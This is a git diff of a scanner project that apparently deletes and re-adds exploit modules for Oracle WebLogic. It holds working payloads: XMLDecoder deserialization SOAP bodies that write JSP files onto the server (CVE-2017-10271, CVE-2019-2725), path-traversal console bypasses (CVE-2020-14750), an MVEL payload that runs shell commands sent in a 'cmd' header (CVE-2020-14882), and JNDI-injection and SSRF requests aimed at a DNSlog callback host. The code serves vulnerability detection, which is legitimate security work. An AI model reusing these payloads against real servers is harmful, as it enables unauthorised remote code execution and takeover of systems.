-</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>''',
-        'path-2': '_async/{FILENAME}.jsp'
-    },
-        {
-        'path-1': 'AsyncResponseService',
-        'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[
-<% out.println("<h1>{RCEMD}</h1>"); %>]]>
-</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>''',
-        'path-2': '{FILENAME}.jsp',
-    },
-]
-
-def cve_2019_2725_scan(clients):
-    ''' Weblogic 
-            部分版本WebLogic中默认包含的wls9_async_response包, 为WebLogicServer提供异步通讯服务
-            由于该WAR包在反序列化处理输入信息时存在缺陷, 在未授权的情况下可以远程执行命令
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Weblogic',
-        'vul_type': 'unSerialization',
-        'vul_id': 'CVE-2019-2725',
-    }
-
-    headers = {
-        'Content-Type': 'text/xml'
-    }
-
-    for payload in cve_2019_2725_payloads:
-        randomFileName = random_md5()
-        randomStr = random_md5()
-        
-        path_1 = payload['path-1']
-        data_1 = payload['data-1'].format(FILENAME=randomFileName, RCEMD=randomStr)
-        path_2 = payload['path-2'].format(FILENAME=randomFileName)
-
-        res1 = client.request(
-            'post',
-            path_1,
-            data=data_1,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        sleep(3)                    # * 延时, 因为命令执行生成文件可能有延迟, 要等一会判断结果才准确
-
-        res2 = client.request(
-            'get',
-            path_2,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        if ((res2.status_code == 200) and (randomStr in res2.text)):
-            results = {
-                'Target': res1.request.url,
-                'Verify': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request-1': res1,
-                'Request-2': res2,
-            }
-            return results
-    return None
diff --git a/payloads/Weblogic/cve_2020_14750.py b/payloads/Weblogic/cve_2020_14750.py
deleted file mode 100644
index d48606c..0000000
--- a/payloads/Weblogic/cve_2020_14750.py
+++ /dev/null
@@ -1,66 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-cve_2020_14750_payloads = [
-    {'path': 'images/%252E./console.portal'},
-    {'path': 'images/%252e%252e%252fconsole.portal'},
-    {'path': 'css/%252E./console.portal'},
-    {'path': 'css/%252e%252e%252fconsole.portal'},
-    {'path': 'console/images/%252E./console.portal'},
-    {'path': 'console/images/%252e%252e%252fconsole.portal'},
-    {'path': 'console/css/%252E./console.portal'},
-    {'path': 'console/css/%252e%252e%252fconsole.portal'},
-]
-
-def cve_2020_14750_scan(clients):
-    ''' Weblogic 权限验证绕过漏洞
-            可通过目录跳转符../回到上一级目录, 然后在../后面拼接console后台目录, 即可绕过后台登录, 直接进入后台
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Weblogic',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'CVE-2020-14750',
-    }
-    
-    headers = {}
-
-    for payload in cve_2020_14750_payloads:
-        path = payload['path']
-
-        res1 = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        if ((res1.status_code == 302) and (res1.headers.get('Set-Cookie'))):
-            cookie = {
-                'Cookie': res1.headers.get('Set-Cookie', '')
-            }
-            headers.update(cookie)
-
-            res2 = client.request(
-                'get',
-                path,
-                headers=headers,
-                vul_info=vul_info
-            )
-            if res2 is None:
-                continue
-
-            if (('管理控制台' in res2.text) 
-                or ('Information and Resources' in res2.text) 
-                or ('Overloaded' in res2.text)):
-                results = {
-                    'Target': res2.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Cookie': cookie['Cookie'],
-                    'Request': res2,
-                }
-                return results
-    return None
diff --git a/payloads/Weblogic/cve_2020_14882.py b/payloads/Weblogic/cve_2020_14882.py
deleted file mode 100644
index 827affc..0000000
--- a/payloads/Weblogic/cve_2020_14882.py
+++ /dev/null
@@ -1,58 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-import http.client
-
-cve_2020_14882_payloads = [
-    {'path': 'images/%252E./consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'},
-    {'path': 'images/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'},
-    {'path': 'console/images/%252E./consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'},
-    {'path': 'console/images/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'}
-]
-
-def cve_2020_14882_scan(clients):
-    ''' Weblogic 管理控制台未授权远程命令执行
-            配合CVE-2020-14750未授权进入后台, 调用相关接口实现命令执行
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Weblogic',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2020-14882',
-    }
-
-    randomStr = random_md5(6)
-    RCEcommand = 'echo ' + randomStr
-    
-    headers = {
-        'cmd': RCEcommand
-    }
-
-    for payload in cve_2020_14882_payloads:
-        path = payload['path']
-
-        # * 有时候用HTTP1.1会报错, 使用HTTP1.0试试
-        # http.client.HTTPConnection._http_vsn = 10
-        # http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
-        res = client.request(
-            'get',
-            path,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-        # http.client.HTTPConnection._http_vsn = 11
-        # http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
-
-        if (check.check_res(res.text, randomStr)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Weblogic/cve_2021_2109.py b/payloads/Weblogic/cve_2021_2109.py
deleted file mode 100644
index cfcb353..0000000
--- a/payloads/Weblogic/cve_2021_2109.py
+++ /dev/null
@@ -1,84 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-
-cve_2021_2109_payloads = [
-    {'path': 'console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/aksm;AdminServer%22)'},
-    {'path': 'console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/aksm;AdminServer%22)'},
-    {'path': 'console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns//DNSDOMAIN/aksm;AdminServer%22)'},
-    {'path': 'css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/dpqm;AdminServer%22)'},
-    {'path': 'css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/dpqm;AdminServer%22)'},
-    {'path': 'css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns://DNSDOMAIN/dpqm;AdminServer%22)'},
-    {'path': 'console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/qsju;AdminServer%22)'},
-    {'path': 'console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/qsju;AdminServer%22)'},
-    {'path': 'console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns://DNSDOMAIN/qsju;AdminServer%22)'},
-    {'path': 'consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/apso;AdminServer%22)'},
-    {'path': 'consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/apso;AdminServer%22)'},
-    {'path': 'consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns://DNSDOMAIN/apso;AdminServer%22)'},
-
-    # * 请求太多了, POST的Payload就先不用了
-    # {
-    #     'path': 'console/css/%252e%252e/consolejndi.portal',
-    #     'data': '_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/abc;AdminServer%22)',
-    # },
-    # {
-    #     'path': 'console/consolejndi.portal',
-    #     'data': '_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/asd;AdminServer%22)',
-    # },
-]
-
-def cve_2021_2109_scan(clients):
-    ''' CVE-2021-2109中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器 '''
-    client = clients.get('reqClient')
-    sessid = '44e10e50016cd558fda134f11a5c88ec'
-    
-    vul_info = {
-        'app_name': 'Weblogic',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2021-2109',
-    }
-    
-    headers = {
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-    }
-
-    for payload in cve_2021_2109_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dnsDomain = md + '.' + dns.domain(sessid)               # * DNSLOG域名
-        
-        # * ---------------该漏洞特性, 192.168.1;1 其中第三个位置的.需要换成分号;
-        domainList = dnsDomain.split('.')
-        newDnsDomain = ''
-        
-        for i in range(len(domainList)):
-            if (i == len(domainList) - 1):
-                newDnsDomain += ';' + domainList[i]
-                break
-            
-            newDnsDomain += '.' + domainList[i]
-        # * ---------------该漏洞特性, 192.168.1;1 其中第三个位置的.需要换成分号;
-        
-        path = payload['path'].replace('DNSDOMAIN', newDnsDomain[1:])  # * [0]是符号. 需要去掉
-        # data = payload['data']
-
-        res = client.request(
-            'get',
-            path,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Weblogic/main.py b/payloads/Weblogic/main.py
deleted file mode 100644
index c8ffed7..0000000
--- a/payloads/Weblogic/main.py
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Weblogic扫描类: 
-        1. Weblogic 管理控制台未授权远程命令执行
-            CVE-2020-14882
-            
-        2. Weblogic 权限验证绕过漏洞
-            CVE-2020-14750
-            
-        3. Weblogic wls9_async_response 反序列化漏洞
-            CVE-2019-2725
-            
-        4. Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞
-            CVE-2017-10271
-
-        5. Weblogic 服务端请求伪造 (SSRF)
-            CVE-2014-4210
-
-        6. Weblogic LDAP 远程代码执行漏洞
-            CVE-2021-2109
-                Payload: http://wiki.peiqi.tech/wiki/webserver/Weblogic/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2021-2109.html
-                         https://www.freebuf.com/vuls/261710.html
-                         https://github.com/WhiteHSBG/JNDIExploit/
-
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Weblogic.cve_2014_4210 import cve_2014_4210_scan
-from payloads.Weblogic.cve_2017_10271 import cve_2017_10271_scan
-from payloads.Weblogic.cve_2019_2725 import cve_2019_2725_scan
-from payloads.Weblogic.cve_2020_14750 import cve_2020_14750_scan
-from payloads.Weblogic.cve_2020_14882 import cve_2020_14882_scan
-from payloads.Weblogic.cve_2021_2109 import cve_2021_2109_scan
-
-class Weblogic():
-    def __init__(self):
-        self.app_name = 'Weblogic'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2014_4210_scan, clients=clients),
-            thread(target=cve_2017_10271_scan, clients=clients),
-            thread(target=cve_2019_2725_scan, clients=clients),
-            thread(target=cve_2020_14750_scan, clients=clients),
-            thread(target=cve_2020_14882_scan, clients=clients),
-            thread(target=cve_2021_2109_scan, clients=clients),
-        ]
-
-weblogic = Weblogic()
diff --git a/payloads/Weblogic/oracle-weblogic-cve-2014-4210-ssrf.py b/payloads/Weblogic/oracle-weblogic-cve-2014-4210-ssrf.py
new file mode 100644
index 0000000..4c5bd0c
--- /dev/null
+++ b/payloads/Weblogic/oracle-weblogic-cve-2014-4210-ssrf.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Weblogic 服务端请求伪造 (SSRF)
+    CVE-2014-4210
+        Payload: https://vulhub.org/#/environments/weblogic/ssrf/
+
+Weblogic uddiexplorer SSRF漏洞
+    uddiexplorer组件的SearchPublicRegistries.jsp页面存在一个SSRF漏洞
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'uddiexplorer/SearchPublicRegistries.jsp?operator=http://DNSDOMAIN/&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'},
+            {'path': 'SearchPublicRegistries.jsp?operator=http://DNSDOMAIN/&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'}
+        ]
+
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '0fe976335bbe903a97650f15dcb0ce47'
+
+        vul_info = {
+            'app_name': 'Weblogic',
+            'vul_type': 'SSRF',
+            'vul_id': 'CVE-2014-4210',
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Weblogic/oracle-weblogic-cve-2017-10271-unserialize.py b/payloads/Weblogic/oracle-weblogic-cve-2017-10271-unserialize.py
new file mode 100644
index 0000000..0b7dae6
--- /dev/null
+++ b/payloads/Weblogic/oracle-weblogic-cve-2017-10271-unserialize.py
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞
+    CVE-2017-10271
+        Payload: https://vulhub.org/#/environments/weblogic/CVE-2017-10271/
+
+Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞
+    Weblogic的WLS Security组件对外提供webservice服务,
+    其中使用了XMLDecoder来解析用户传入的XML数据, 在解析的过程中出现反序列化漏洞, 导致可执行任意命令
+    < 10.3.6
+'''
+
+from lib.tool.md5 import random_md5
+from time import sleep
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path-1': 'wls-wsat/CoordinatorPortType',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
+                'path-2': 'wls-wsat/{FILENAME}.jsp',
+            },
+            {
+                'path-1': 'wls-wsat/CoordinatorPortType',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/9j4dqk/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
+                'path-2': 'wls-wsat/{FILENAME}.jsp',
+            },
+                {
+                'path-1': 'CoordinatorPortType',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
+                'path-2': '{FILENAME}.jsp',
+            },
+            {
+                'path-1': 'CoordinatorPortType',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/9j4dqk/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
+                'path-2': '{FILENAME}.jsp',
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Weblogic',
+            'vul_type': 'unSerialize',
+            'vul_id': 'CVE-2017-10271',
+        }
+
+        headers = {
+            'Content-Type': 'text/xml'
+        }
+
+        for payload in self.payloads:
+            randomFileName = random_md5()
+            randomStr = random_md5()
+            
+            path_1 = payload['path-1']
+            data_1 = payload['data-1'].format(FILENAME=randomFileName, RCEMD=randomStr)
+            path_2 = payload['path-2'].format(FILENAME=randomFileName)
+
+            res1 = client.request(
+                'post',
+                path_1,
+                data=data_1,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            sleep(3)                    # * 延时, 因为命令执行生成文件可能有延迟, 要等一会判断结果才准确
+            
+            res2 = client.request(
+                'get',
+                path_2,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+            
+            if ((res2.status_code == 200) and (randomStr in res2.text)):
+                results = {
+                    'Target': res1.request.url,
+                    'Verify': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request-1': res1,
+                    'Request-2': res2,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Weblogic/oracle-weblogic-cve-2019-2725-unserialize.py b/payloads/Weblogic/oracle-weblogic-cve-2019-2725-unserialize.py
new file mode 100644
index 0000000..11d50fa
--- /dev/null
+++ b/payloads/Weblogic/oracle-weblogic-cve-2019-2725-unserialize.py
@@ -0,0 +1,112 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Weblogic wls9_async_response 反序列化漏洞
+    CVE-2019-2725
+        Payload: 
+                 https://blog.csdn.net/yeshankuangrenaaaaa/article/details/107533194
+
+部分版本WebLogic中默认包含的wls9_async_response包, 为WebLogicServer提供异步通讯服务
+    由于该WAR包在反序列化处理输入信息时存在缺陷, 在未授权的情况下可以远程执行命令
+'''
+
+from lib.tool.md5 import random_md5
+from time import sleep
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            # * bea_wls9_async_response/8tpkys/war
+            {
+                'path-1': '_async/AsyncResponseService',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[
+        <% out.println("<h1>{RCEMD}</h1>"); %>]]>
+        </string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>''',
+                'path-2': '_async/{FILENAME}.jsp'
+            },
+            {
+                'path-1': 'AsyncResponseService',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[
+        <% out.println("<h1>{RCEMD}</h1>"); %>]]>
+        </string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>''',
+                'path-2': '{FILENAME}.jsp',
+            },
+            
+            # * bea_wls_internal/9j4dqk/war
+            {
+                'path-1': '_async/AsyncResponseService',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[
+        <% out.println("<h1>{RCEMD}</h1>"); %>]]>
+        </string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>''',
+                'path-2': 'bea_wls_internal/{FILENAME}.jsp'
+            },
+            {
+                'path-1': 'AsyncResponseService',
+                'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[
+        <% out.println("<h1>{RCEMD}</h1>"); %>]]>
+        </string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>''',
